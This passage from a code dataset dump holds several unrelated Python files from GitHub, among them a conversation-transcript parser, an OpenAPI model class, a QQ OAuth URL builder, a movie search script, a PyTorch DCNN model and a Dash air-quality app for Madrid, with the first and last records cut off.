topRect.h + ' Top Rectangle Width: ' + topRect.w)\n nt.putValue('TopRectHeight', topRect.h)\n nt.putValue('TopRectWidth', topRect.w)\n print('Bottom Rectangle Height: ' + botRect.h + ' Bottom Rectangle Width: ' + botRect.w)\n nt.putValue('BotRectHeight', botRect.h)\n nt.putValue('BotRectWidth', botRect.w)\n print('Total Height: ' + (topRect.topY - botRect.botY) + ' Total Width: ' + (botRect.rightX - topRect.leftX))\n nt.putValue('TotalHeight', (topRect.topY - botRect.botY))\n nt.putValue('TotalWidth', (botRect.rightX - topRect.leftX))\n","repo_name":"FRCTeam279/VisionPlayground","sub_path":"Boiler/boilerValues.py","file_name":"boilerValues.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27955259318","text":"import re\nfrom typing import List\nimport oneai\nfrom oneai.classes import Utterance\n\n\n# v 1.6.1\ndef parse_conversation(text: str, strict=False) -> List[Utterance]:\n \"\"\"\n Parse a string with a conversation format into a structured `Utterance` list representing the conversation.\n\n ## Parameters\n\n `text: str`\n The text to parse.\n\n ## Returns\n\n A list of `Utterance` objects produced from `text`.\n\n ## Raises\n\n `ValueError` if `text` is not in a valid conversation format.\n \"\"\"\n\n srt_regex = re.compile(\n r\"\\d+\\n\\d{1,2}:\\d{2}:\\d{2}[,.]\\d{1,3} --> \\d{1,2}:\\d{2}:\\d{2}[,.]\\d{1,3}\"\n )\n match = srt_regex.match(text)\n if match:\n data_array = srt_regex.split(text)\n return [\n Utterance(speaker=\"SPEAKER\", utterance=line.strip().replace(\"\\n\", \" \"))\n for line in data_array[1:]\n ]\n\n result = []\n lines = re.split(r\"\\r?\\n\", text.strip())\n firstLine = True\n structure = None\n currentLineInfo = None\n waitForTextLine = False\n # weak = False\n previousObject = None\n\n for i, line in enumerate(lines):\n if _isEmptyOrWhitespace(line):\n continue\n\n if waitForTextLine:\n previousObject[\"text\"] = line.strip()\n # previousObject[\"text_line\"] = i\n waitForTextLine = False\n continue\n\n currentLineInfo = _parseSpeakerLine(line)\n if currentLineInfo is None:\n if firstLine:\n raise ValueError(f\"Invalid conversation format at line {i}\")\n previousObject[\"text\"] += \"\\n\" + line.strip()\n # weak = True\n continue\n\n if firstLine:\n structure = currentLineInfo\n\n # weak |= currentLineInfo[\"weak\"]\n if strict and not _comp(structure, currentLineInfo):\n raise ValueError(\n f\"Differing conversation format at line {i}, run with strict=False to ignore\"\n )\n\n firstLine = False\n\n previousObject = {\n \"speaker\": currentLineInfo[\"speaker\"],\n \"text\": currentLineInfo[\"text\"],\n # \"speaker_line\": i, # what are these properties for? do I want them in Utterance objects?\n # \"text_line\": i,\n # \"speaker_length\": currentLineInfo[\"speaker_end\"],\n }\n if currentLineInfo[\"timestamp\"]:\n previousObject[\"timestamp\"] = currentLineInfo[\"timestamp\"]\n\n result.append(previousObject)\n waitForTextLine = not currentLineInfo[\"hasText\"]\n if previousObject and _isEmptyOrWhitespace(previousObject[\"text\"]):\n result.pop()\n\n return [\n Utterance(\n speaker=u[\"speaker\"],\n utterance=u[\"text\"],\n timestamp=u.get(\"timestamp\", None),\n )\n for u in result\n ]\n\n\ndef _isEmptyOrWhitespace(text):\n return (not text) or (text.isspace())\n\n\ndef _parseSpeakerLine(text: str):\n value = {\n \"weak\": True,\n \"preTime\": False,\n \"speaker\": None,\n \"speaker_end\": None,\n \"time\": False,\n \"timestamp\": None,\n \"timestamp_full_match_string\": None,\n \"separator\": False,\n \"hasText\": False,\n \"text\": None,\n }\n\n ################################################\n # extracting timestamp from text\n matchArea = text[:40]\n colonPos = matchArea.find(\":\")\n timestampFound = get_timestamp(matchArea, value)\n signatureEndPos = 0\n if timestampFound:\n if colonPos != -1 and colonPos < value[\"timestamp_position\"]:\n timestampFound = False\n value[\"time\"] = False\n value[\"timestamp\"] = None\n else:\n if value[\"timestamp_position\"] == 0:\n value[\"preTime\"] = True\n text = text.replace(value[\"timestamp_full_match_string\"], \"\")\n matchArea = matchArea.replace(value[\"timestamp_full_match_string\"], \"\")\n signatureEndPos = len(value[\"timestamp_full_match_string\"])\n ################################################\n # check if speaker only, in all caps - WEAK PATTERN\n match = (\n re.search(r\"^[ A-Za-z_-]{3,20}$\", text)\n if timestampFound\n else re.search(r\"^[ A-Z_-]{3,20}$\", text)\n )\n if match is not None:\n value[\"weak\"] = not timestampFound\n value[\"speaker\"] = match[0].strip()\n # end position for speaker signature area (for highlighting),\n # use match[0].length to include whitespace\n value[\"speaker_end\"] = len(match[0]) + signatureEndPos\n value[\"hasText\"] = False\n return value\n\n # update colon position after timestamp removal\n if timestampFound:\n colonPos = matchArea.find(\":\")\n\n if colonPos == -1 and not timestampFound:\n return None # failed to find signature\n\n if colonPos == -1: # only timestamp\n if len(text) != 0:\n return None # if text after timestamp, fail\n value[\"weak\"] = True\n value[\"speaker\"] = \"Speaker\"\n value[\"speaker_end\"] = signatureEndPos\n value[\"hasText\"] = False\n\n value[\"separator\"] = True\n\n # if no whitespace after speaker, fail same line text\n textPos = colonPos + 1\n value[\"hasText\"] = textPos < len(text.rstrip()) - 1\n if value[\"hasText\"] and \" \\t\\n\\r\\v\".find(text[textPos]) == -1:\n return None\n\n value[\"weak\"] = False\n value[\"text\"] = text[textPos:].strip() if value[\"hasText\"] else None\n value[\"speaker\"] = text[:colonPos].strip()\n value[\"speaker_end\"] = signatureEndPos + colonPos\n return value\n\n\ndef _comp(a, b):\n return (\n a[\"separator\"] == b[\"separator\"]\n and a[\"time\"] == b[\"time\"]\n and a[\"preTime\"] == b[\"preTime\"]\n and a[\"hasText\"] == b[\"hasText\"]\n )\n\n\ndef get_timestamp(text, value):\n # match preceding timestamp \"[3:07 PM, 3/15/2022] Adam Hanft: Helps\"\n match = re.search(r\"(^\\s*\\[?\\s*)([0-9:,\\sPAM/]{4,23})(\\]?)\\s*\", text)\n if match is not None and (match[3] or match[0].find(\"/\") != -1):\n value[\"preTime\"] = True\n value[\"weak\"] = False\n value[\"time\"] = True\n value[\"timestamp\"] = match[2].strip()\n value[\"timestamp_position\"] = index_of_group(match, 2)\n value[\"timestamp_full_match_string\"] = match[0]\n return True\n\n # optinal [ timestamp ] \\s*\n match = re.search(r\"(^\\s*)?(\\[?)(\\d{1,2}:\\d{1,2})(:\\d{1,2})?(\\.\\d*)?(\\]?\\s*)\", text)\n if match is not None:\n value[\"weak\"] = False\n value[\"time\"] = True\n value[\"timestamp_position\"] = match.start()\n value[\"timestamp_full_match_string\"] = match[0]\n # capture timestamp without non-captured groups\n value[\"timestamp\"] = text[\n index_of_group(match, 3) : index_of_group(match, 6)\n ].strip()\n return True\n\n return False\n\n\ndef index_of_group(match: re.Match, group: int):\n ix = match.start()\n for i in range(1, group):\n if match[i]:\n ix += len(match[i])\n return ix\n","repo_name":"oneai-nlp/oneai-python","sub_path":"src/oneai/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"25164252510","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom openapi_server.models.base_model_ import Model\nfrom openapi_server.models.identifier import Identifier\nfrom openapi_server.models.tag import Tag\nfrom openapi_server import util\n\nfrom openapi_server.models.identifier import Identifier # noqa: E501\nfrom openapi_server.models.tag import Tag # noqa: E501\n\nclass Check(Model):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, timestamp=None, identifiers=None, tags=None, left_compare_obj=None, right_compare_obj=None, operator='equals', uname=None): # noqa: E501\n \"\"\"Check - a model defined in OpenAPI\n\n :param timestamp: The timestamp of this Check. # noqa: E501\n :type timestamp: datetime\n :param identifiers: The identifiers of this Check. # noqa: E501\n :type identifiers: List[Identifier]\n :param tags: The tags of this Check. # noqa: E501\n :type tags: List[Tag]\n :param left_compare_obj: The left_compare_obj of this Check. # noqa: E501\n :type left_compare_obj: Dict[str, object]\n :param right_compare_obj: The right_compare_obj of this Check. # noqa: E501\n :type right_compare_obj: Dict[str, object]\n :param operator: The operator of this Check. # noqa: E501\n :type operator: str\n :param uname: The uname of this Check. # noqa: E501\n :type uname: str\n \"\"\"\n self.openapi_types = {\n 'timestamp': datetime,\n 'identifiers': List[Identifier],\n 'tags': List[Tag],\n 'left_compare_obj': Dict[str, object],\n 'right_compare_obj': Dict[str, object],\n 'operator': str,\n 'uname': str\n }\n\n self.attribute_map = {\n 'timestamp': 'timestamp',\n 'identifiers': 'identifiers',\n 'tags': 'tags',\n 'left_compare_obj': 'leftCompareObj',\n 'right_compare_obj': 'rightCompareObj',\n 'operator': 'operator',\n 'uname': 'uname'\n }\n\n self._timestamp = timestamp\n self._identifiers = identifiers\n self._tags = tags\n self._left_compare_obj = left_compare_obj\n self._right_compare_obj = right_compare_obj\n self._operator = operator\n self._uname = uname\n\n @classmethod\n def from_dict(cls, dikt) -> 'Check':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The check of this Check. # noqa: E501\n :rtype: Check\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def timestamp(self):\n \"\"\"Gets the timestamp of this Check.\n\n\n :return: The timestamp of this Check.\n :rtype: datetime\n \"\"\"\n return self._timestamp\n\n @timestamp.setter\n def timestamp(self, timestamp):\n \"\"\"Sets the timestamp of this Check.\n\n\n :param timestamp: The timestamp of this Check.\n :type timestamp: datetime\n \"\"\"\n\n self._timestamp = timestamp\n\n @property\n def identifiers(self):\n \"\"\"Gets the identifiers of this Check.\n\n An array of ordered static* identifiers that in combination with the checkUName used as a unique record identifiers.
*Static refers to the fact the identifiers will remain in the same order, unless there's a desired change. # noqa: E501\n\n :return: The identifiers of this Check.\n :rtype: List[Identifier]\n \"\"\"\n return self._identifiers\n\n @identifiers.setter\n def identifiers(self, identifiers):\n \"\"\"Sets the identifiers of this Check.\n\n An array of ordered static* identifiers that in combination with the checkUName used as a unique record identifiers.
*Static refers to the fact the identifiers will remain in the same order, unless there's a desired change. # noqa: E501\n\n :param identifiers: The identifiers of this Check.\n :type identifiers: List[Identifier]\n \"\"\"\n\n self._identifiers = identifiers\n\n @property\n def tags(self):\n \"\"\"Gets the tags of this Check.\n\n Non-unique identifiers (tags) for the check that can be searched by. # noqa: E501\n\n :return: The tags of this Check.\n :rtype: List[Tag]\n \"\"\"\n return self._tags\n\n @tags.setter\n def tags(self, tags):\n \"\"\"Sets the tags of this Check.\n\n Non-unique identifiers (tags) for the check that can be searched by. # noqa: E501\n\n :param tags: The tags of this Check.\n :type tags: List[Tag]\n \"\"\"\n\n self._tags = tags\n\n @property\n def left_compare_obj(self):\n \"\"\"Gets the left_compare_obj of this Check.\n\n Actual result # noqa: E501\n\n :return: The left_compare_obj of this Check.\n :rtype: Dict[str, object]\n \"\"\"\n return self._left_compare_obj\n\n @left_compare_obj.setter\n def left_compare_obj(self, left_compare_obj):\n \"\"\"Sets the left_compare_obj of this Check.\n\n Actual result # noqa: E501\n\n :param left_compare_obj: The left_compare_obj of this Check.\n :type left_compare_obj: Dict[str, object]\n \"\"\"\n\n self._left_compare_obj = left_compare_obj\n\n @property\n def right_compare_obj(self):\n \"\"\"Gets the right_compare_obj of this Check.\n\n Expected result # noqa: E501\n\n :return: The right_compare_obj of this Check.\n :rtype: Dict[str, object]\n \"\"\"\n return self._right_compare_obj\n\n @right_compare_obj.setter\n def right_compare_obj(self, right_compare_obj):\n \"\"\"Sets the right_compare_obj of this Check.\n\n Expected result # noqa: E501\n\n :param right_compare_obj: The right_compare_obj of this Check.\n :type right_compare_obj: Dict[str, object]\n \"\"\"\n if right_compare_obj is None:\n raise ValueError(\"Invalid value for `right_compare_obj`, must not be `None`\") # noqa: E501\n\n self._right_compare_obj = right_compare_obj\n\n @property\n def operator(self):\n \"\"\"Gets the operator of this Check.\n\n Comparison operator, from left to right, when order matters. # noqa: E501\n\n :return: The operator of this Check.\n :rtype: str\n \"\"\"\n return self._operator\n\n @operator.setter\n def operator(self, operator):\n \"\"\"Sets the operator of this Check.\n\n Comparison operator, from left to right, when order matters. # noqa: E501\n\n :param operator: The operator of this Check.\n :type operator: str\n \"\"\"\n allowed_values = [\"equals\", \"notequals\", \"greaterthan\", \"lessthan\", \"contains\", \"notcontains\"] # noqa: E501\n if operator not in allowed_values:\n raise ValueError(\n \"Invalid value for `operator` ({0}), must be one of {1}\"\n .format(operator, allowed_values)\n )\n\n self._operator = operator\n\n @property\n def uname(self):\n \"\"\"Gets the uname of this Check.\n\n Check unique name (used as id) # noqa: E501\n\n :return: The uname of this Check.\n :rtype: str\n \"\"\"\n return self._uname\n\n @uname.setter\n def uname(self, uname):\n \"\"\"Sets the uname of this Check.\n\n Check unique name (used as id) # noqa: E501\n\n :param uname: The uname of this Check.\n :type uname: str\n \"\"\"\n if uname is None:\n raise ValueError(\"Invalid value for `uname`, must not be `None`\") # noqa: E501\n\n self._uname = uname\n","repo_name":"yanirta/assertio","sub_path":"server/openapi_server/models/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3230339424","text":"# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'liupeiyu'\r\n\r\nfrom qq_config import *\r\nfrom qq_request_params import *\r\nimport urllib\r\n\r\nclass QQAuthorize(object):\r\n\t'''\r\n\thttps://graph.qq.com/oauth2.0/authorize?response_type=code&\r\n\t\tclient_id=[YOUR_APPID]&\r\n\t\tredirect_uri=[YOUR_REDIRECT_URI]&\r\n\t\tscope=[THE_SCOPE]\r\n\t'''\r\n\tQQ_AUTHORIZE_URL_TMPL =\"https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id={}&redirect_uri={}&state={}\"\r\n\r\n\r\n\tdef __init__(self, request):\r\n\t\tself.authorize_post_request = request\r\n\r\n\t\tself.qq_config = QQConfig(request.user_profile)\r\n\t\tself.qq_params = QQRequestParams\r\n\t\tself.redirect_uri = self.qq_config.get_login_callback_redirect_uri(request)\r\n\r\n\tdef get_Http_authorize_url(self):\r\n\t\tstate = self.qq_config.get_state(self.authorize_post_request)\r\n\t\tverity_url = self.QQ_AUTHORIZE_URL_TMPL.format(\r\n\t\t\tself.qq_config.app_id,\r\n\t\t\turllib.quote(self.redirect_uri, ''),\r\n\t\t\tstate)\r\n\t\treturn verity_url","repo_name":"chengdg/weizoom","sub_path":"weapp/core/qq/qq_authorize.py","file_name":"qq_authorize.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32617268730","text":"\"\"\"\r\nThis script is the first search engine without a score\r\nreturns title, intro and url for relevant films\r\n\"\"\"\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n# get the urls of each movie\r\nsoup = BeautifulSoup(open(\"movies1.html\"), features=\"lxml\")\r\nurl_list = []\r\nfor url in soup.findAll('a', href=True):\r\n url_list.append(url['href'])\r\n\r\n# import the vocab csv\r\nvocab = pd.read_csv(\"vocab.csv\")\r\nvocab = vocab.set_index(\"0\").to_dict()[\"Unnamed: 0\"]\r\nop = pd.read_csv(\"inverted_indices.csv\").transpose()\r\n\r\nsentence = \"lion king\"\r\n\r\nhtmls = []\r\nfor word in sentence.split(): # go trough each word in sentence and match the word with id's in vocab csv\r\n try:\r\n id = vocab[word]\r\n except KeyError:\r\n word = word[:-1] # sometimes the last letter of a word is droped when nltk library used because of an un known reason\r\n try: # to overcome this, the matching is done with eliminating the last letter\r\n id = vocab[word]\r\n except KeyError:\r\n continue\r\n\r\n doc = op.iloc[id].values[0].split()\r\n doc[0] = doc[0][1:]\r\n doc[-1] = doc[-1][:-1]\r\n htmls.append(set(doc))\r\n\r\n# use set intersection to get the documents containing all words\r\nintersection = set.intersection(*htmls)\r\n# create a results dataframe to store the info\r\nresults = pd.DataFrame({'Title': [], 'Intro': [], 'url': []})\r\ncounter = 0\r\nfor document in intersection:\r\n document = re.findall(r'\\d+', document)[0]\r\n\r\n soup = BeautifulSoup(open(\"movies\\\\article_\" + document + \".html\", encoding=\"utf8\"), \"html.parser\")\r\n # get title ( same in parse)\r\n title = soup.find(\"h1\").text\r\n # get intro (same in parse)\r\n Intro = \"\"\r\n par = soup.p # first paragraph of the html page\r\n while par.next_element.name != \"h2\" and par.next_element.name != \"h3\": # until a heading, combine all paragraphs\r\n if par.name == \"p\":\r\n Intro += par.get_text()\r\n par = par.next_element\r\n # get url ( same in fetch_urls)\r\n url = url_list[int(document)]\r\n results.loc[counter] = [title, Intro, url]\r\n counter += 1\r\n\r\nprint(results)\r\n############################################################################################################\r\n#SEARCH ENGINE 2 (NOT COMPLETED)\r\nfrom nltk.tokenize import word_tokenize, RegexpTokenizer\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nimport json\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nwith open('C:/Users/Capp/Documents/Università/Magistrale/1-ADM/Homework3/inverted_indices_score.json', \"r\") as f: # Just use 'w' mode in 3.x\r\n inverted_indices=json.load(f)\r\nsentence=input()\r\ndef clean_text(sentence):\r\n stop_words = set(stopwords.words(\"english\"))\r\n tokens = RegexpTokenizer(r\"\\w+\")\r\n porter = PorterStemmer()\r\n stem_words = list(map(porter.stem, tokens.tokenize(sentence)))\r\n words = filter(lambda x: x not in string.punctuation, stem_words)\r\n cleaned_text = filter(lambda x: x not in stop_words, words)\r\n return string\r\n\r\nquery={}\r\nvectorizer=TfidfVectorizer()\r\nv=vectorizer.fit_transform(string)\r\nfor i in range(len(string)):\r\n query[string[i]]=''.join((str(v[i])[3:-5]).split())\r\n##\r\nl=[]\r\nfor el in string:\r\n se=set()\r\n for i in range(len(inverted_indices[el])):\r\n se=se|{inverted_indices[el][i][0]}\r\n l.append(se)\r\ndocs=l[0]\r\nfor i in range(1,len(l)):\r\n docs=docs&l[i-1]\r\n\r\nn={}\r\nd1={}\r\nd2={}\r\nfor doc in docs:\r\n for el in string:\r\n query[el]='0.'+query[el][2:len(query[el])]\r\n y=float(query[el])\r\n for i in range(len((inverted_indices[el]))):\r\n if inverted_indices[el][i][0]==doc:\r\n inv='0.'+inverted_indices[el][i][1][2:len(inverted_indices[el][i][1])]\r\n x=float(inv)\r\n if inverted_indices[el][i][0] not in n:\r\n n[inverted_indices[el][i][0]]=(x*y)\r\n else:\r\n n[inverted_indices[el][i][0]]+=(x*y) #Summation of numerator\r\n ##\r\n if inverted_indices[el][i][0] not in d1:\r\n d1[inverted_indices[el][i][0]]=x**2\r\n else:\r\n d1[inverted_indices[el][i][0]]+=x**2 #summation of first part denominator\r\n ##\r\n if inverted_indices[el][i][0] not in d2:\r\n d2[inverted_indices[el][i][0]]=y**2\r\n else:\r\n d2[inverted_indices[el][i][0]]+=y**2 #summation of second part denominator\r\n else:\r\n pass\r\nresults={} #A dictionary with all documents and relatives cosine similarity values\r\nfor el in n:\r\n try:\r\n results[el]=(n[el])/((d1[el])**(1/2))*((d2[el])**(1/2))\r\n except ZeroDivisionError:\r\n continue\r\n","repo_name":"Capp18/ADM_HW3","sub_path":"workings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24059222024","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom django.conf.urls import url\nfrom . import views\n\n#\n# 如上例,使用{% url 'detail' %} 可以根据polls.urls 中的name='detail' 来匹配。如果在同一个project下有多个app,其中都有name='detail' 时,又该如何匹配views呢?\n# 解决方法是,添加namespace到URLconf中,如在polls/urls.py 中添加: app_name = 'polls'\n\n# 本教程例子中,只有一个app也就是polls,但是在现实中很显然会有5个、10个、更多的app同时存在一个项目中。\n# Django是如何区分这些app之间的URL name呢?\n# 答案是使用URLconf的命名空间。在polls/urls.py文件的开头部分,添加一个app_name的变量来指定该应用的命名空间:\n#\n\napp_name = 'polls' # 关键是这行\nurlpatterns = [\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n\n # ex: /polls/5/\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n # ex: /polls/5/results/\n url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n # ex: /polls/5/vote/\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n]\n\n\n\n# URLconfs 中,正则表达式中的分组()作为参数传递给view,如url(r'^(?P[0-9]+)/$', views.detail, name='detail')\n#\n# 假如请求url为 polls/34/ 相当于调用detail(request,question_id='34')\n#\n# 分别访问一下url可见调用不同的view 函数进行相应\n#\n# http://localhost:8000/polls/\n#\n# http://localhost:8000/polls/34/\n# http://localhost:8000/polls/34/results/\n# http://localhost:8000/polls/34/vote/\n","repo_name":"baliguan163/python_web_tools","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8819215419","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Time : 2020/5/17 10:05\n# Author : 未闻花名\n# Site : \n# File : models.py\n# Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom layer import DiffusionConvolution, Linear\n\nclass DCNN(nn.Module):\n def __init__(self, nfeat, nhop, nclass, dropout):\n super(DCNN, self).__init__()\n self.dcnn = DiffusionConvolution(nhop, nfeat)\n self.fc = Linear(nhop*nfeat ,nclass)\n self.dropout = dropout\n self.nhop = nhop\n\n def forward(self, x, convertmx): #x: N x F\n pb, pf = convertmx, convertmx\n\n for i in range(1, self.nhop):\n # pb = torch.spmm(pb, convertmx)\n pb = torch.mm(pb, convertmx)\n pf = torch.cat((pf, pb), dim=1)\n\n pf = pf.view((convertmx.size(0), self.nhop, convertmx.size(0))) #N x nhop x N\n x = F.tanh(self.dcnn(pf, x)) #N x nhop x F\n x = F.dropout(x, self.dropout, training=self.training)\n\n x = x.view((convertmx.size(0), self.nhop*x.size(-1))) #N x nhop*F\n # x = F.tanh(self.fc(x)) #N x c\n x = self.fc(x)\n return F.log_softmax(x, dim=1)\n\n\n\n\n\n\n","repo_name":"XgSuen/GCN","sub_path":"dcnn_code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73401603432","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nimport datetime as dt\nimport itertools\n\nimport numpy as np\nimport matplotlib.tri as tri\nimport import_data\n\nimport base64\nwith open(\"./assets/map.png\", \"rb\") as image_file:\n encoded_string = base64.b64encode(image_file.read()).decode()\n#add the prefix that plotly will want when using the string as source\nencoded_image = \"data:image/png;base64,\" + encoded_string\n\ncompuestos = {\"Dióxido de Azufre\": 1, \"Monóxido de Carbono\" : 6, \"Monóxido de Nitrógeno\": 7, \"Dióxido de Nitrógeno\": 8, \"Partículas < 2.5 µm\": 9, \"Partículas < 10 µm\": 10, \"Óxidos de Nitrógeno\": 12, \"Ozono\": 14, \"Tolueno\": 20, \"Benceno\": 30, \"Etilbenceno\": 35, \"Metaxileno\": 37, \"Paraxileno\": 38, \"Ortoxileno\": 39}\nhoras = {\"1 AM\": \"H01\", \"2 AM\": \"H02\", \"3 AM\": \"H03\", \"4 AM\": \"H04\", \"5 AM\": \"H05\", \"6 AM\": \"H06\", \"7 AM\": \"H07\", \"8 AM\": \"H08\", \"9 AM\": \"H09\", \"10 AM\": \"H10\", \"11 AM\": \"H11\", \"12 AM\": \"H12\", \"1 PM\": \"H13\", \"2 PM\": \"H14\", \"3 PM\": \"H15\", \"4 PM\": \"H16\", \"5 PM\": \"H17\", \"6 PM\": \"H18\", \"7 PM\": \"H19\", \"8 PM\": \"H20\", \"9 PM\": \"H21\", \"10 PM\": \"H22\", \"11 PM\": \"H23\", \"12 PM\": \"H24\"}\n\ndata = import_data.generar_datos()\n\n# Obtenemos la última hora con datos distintos de 0\nfor i in range(len(horas)):\n if(sum(data[horas[list(horas.keys())[i]]].values) != 0):\n latest = i \n\ndef actualizar_datos(tiempo, variable):\n global datos, width, height, z, x, y, x_mean, y_mean\n\n datos = data.iloc[np.where(data.MAGNITUD == variable)[0], :]\n width = np.max(datos[\"lon\"])-np.min(datos[\"lon\"])\n height = np.max(datos[\"lat\"])-np.min(datos[\"lat\"])\n\n z = datos[tiempo].values\n if variable == 6:\n z = z * 1000\n\n x = datos[\"lon\"].values\n y = datos[\"lat\"].values\n y_mean = np.mean(y)\n x_mean = np.mean(x)\n\ndef interpolation(x, y, z):\n\n ngridx = 200\n ngridy = 200\n\n xi = np.linspace(np.min(x), np.max(x), ngridx)\n yi = np.linspace(np.min(y), np.max(y), ngridy)\n\n triang = tri.Triangulation(x, y)\n interpolator = tri.LinearTriInterpolator(triang, z)\n Xi, Yi = np.meshgrid(xi, yi)\n zi = interpolator(Xi, Yi)\n\n return(xi, yi, zi)\n\napp = dash.Dash()\napp.scripts.config.serve_locally=True\napp.css.append_css({\"external_url\": \"https://codepen.io/chriddyp/pen/dZVMbK.css\"})\nserver = app.server\n\n\nstyles = {\n 'pre': {\n 'border': 'thin lightgrey solid',\n 'overflowX': 'scroll'\n },\n 'header': {\n 'height': '60px',\n 'line-height': '60px',\n 'padding': '5px',\n 'padding-left': '10px',\n 'backgroundColor': '#333333'\n },\n 'title': {\n 'font-size': '26px',\n 'padding-left:': '10px',\n 'color': '#ffffff'\n },\n 'logo': {\n 'float': 'right',\n 'padding-left': '15px',\n 'padding': '10px'\n },\n 'plot': {\n 'border-width': '10px',\n 'border-left-style': 'solid',\n 'color': '#ffffff',\n 'backgroundColor': '#333333',\n 'padding' : '10px'\n }\n}\n\ncolors = {\n 'background': '#333333',\n 'text': '#ffffff',\n 'text2': '#706f6f'\n}\n\n\napp.layout = html.Div(style = {}, children =[\n html.Div(\n style = styles['header'], children = [\n html.Div(\n className='six columns',\n children = html.Div(style = styles['title'], children = 'Air Quality Madrid' )\n ),\n html.Div(\n className='six columns',\n children=html.Div(\n style = styles['logo'],\n children=[html.Img(src='https://www.madrid.es/assets/images/logo-madrid.png')])\n )\n ]),\n html.Div(\n children = [\n html.Div(\n style = {'color': colors['text'], 'backgroundColor': colors['background'], 'padding' : '10px'},\n className='two columns',\n children = [\n html.H5(\"Compuesto (µg/m³)\"),\n html.Div(\n style = {'color': colors['background']},\n children =\n dcc.Dropdown(\n id='variable',\n options=[{'label': i, \"value\": compuestos[i]} for i in compuestos],\n value=8,\n )\n ),\n html.H5(\"Hora\"),\n html.Div(\n style = {'color': colors['background']},\n children =\n dcc.Dropdown(\n id='time')\n ),\n html.Div([\n html.Div(id='live-update-text'),\n dcc.Interval(\n id='interval-component',\n interval=1000*60*30, # in milliseconds\n n_intervals=0\n )\n ]),\n html.Br(),\n html.A('Sobre esta app y los datos', href='https://github.com/crossvalidados/AQ_Madrid/blob/master/README.md', target=\"_blank\"),\n html.Br(),\n html.A('Código fuente', href='https://github.com/crossvalidados/AQ_Madrid', target=\"_blank\"),\n html.H6(\"Autores:\", style={'color': colors['text2'], 'font-size': '1em'}),\n html.H6(\"Manuel Bajo y Kevin Craig\", style={'color': colors['text2'], 'font-size': '1em'})\n\n\n ]),\n html.Div(\n className='five columns',\n style = styles['plot'],\n children = [\n html.H5(\"Mapa estaciones\"),\n dcc.Graph(id='map', animate=True)\n ]\n ),\n html.Div(\n className='five columns',\n style = styles['plot'],\n children = [\n html.H5(\"Mapa interpolación\"),\n html.Div(\n children = dcc.Graph(id='cont'))\n ]\n )\n ])\n])\n\n@app.callback(Output('live-update-text', 'children'),\n [Input('interval-component', 'n_intervals')])\ndef update_metrics(n):\n\n global data\n data = import_data.generar_datos()\n style = {'padding': '5px', 'fontSize': '16px'}\n return[]\n\n@app.callback(Output('time', 'options'),\n [Input('interval-component', 'n_intervals')])\ndef update_date_dropdown(name):\n global latest\n \n for i in range(len(horas)):\n if(sum(data[horas[list(horas.keys())[i]]].values) != 0):\n latest = i \n return [{'label': i, \"value\": horas[i]} for i in dict(itertools.islice(horas.items(), latest + 1))]\n\n@app.callback(Output('time', 'value'),\n [Input('time', 'options')])\ndef update_value_dropdown(available_options):\n\n return available_options[-1]['value']\n\n\n@app.callback(\n dash.dependencies.Output('cont', 'figure'),\n [dash.dependencies.Input('time', 'value'),\n dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('variable', 'value')])\n\ndef display_stores_over_time(time, n, variable):\n\n actualizar_datos(time, variable)\n\n xi, yi, zi = interpolation(x, y, z)\n\n return {\n 'data': [\n {\n 'x': xi,\n 'y': yi,\n 'z': zi,\n 'name': 'Open Date',\n 'type': 'contour',\n 'opacity': 0.35,\n 'line': {'width': 0},\n 'contours': {'coloring': 'fill'},\n 'connectgaps': True\n }\n ],\n 'layout': {\n 'margin': {'l': 40, 'r': 20, 't': 10, 'b': 30},\n 'xaxis': dict(\n autorange=True,\n title='Longitud',\n showgrid=False,\n zeroline=False,\n showline=False,\n ),\n 'yaxis': dict(\n autorange=True,\n title = 'Latitud',\n showgrid=False,\n tickangle=270,\n zeroline=False,\n showline=False,\n ),\n 'images': [dict(\n source=encoded_image,\n xref= \"x\",\n yref= \"y\",\n x= np.min(datos[\"lon\"]) - 0.05*width,\n y= 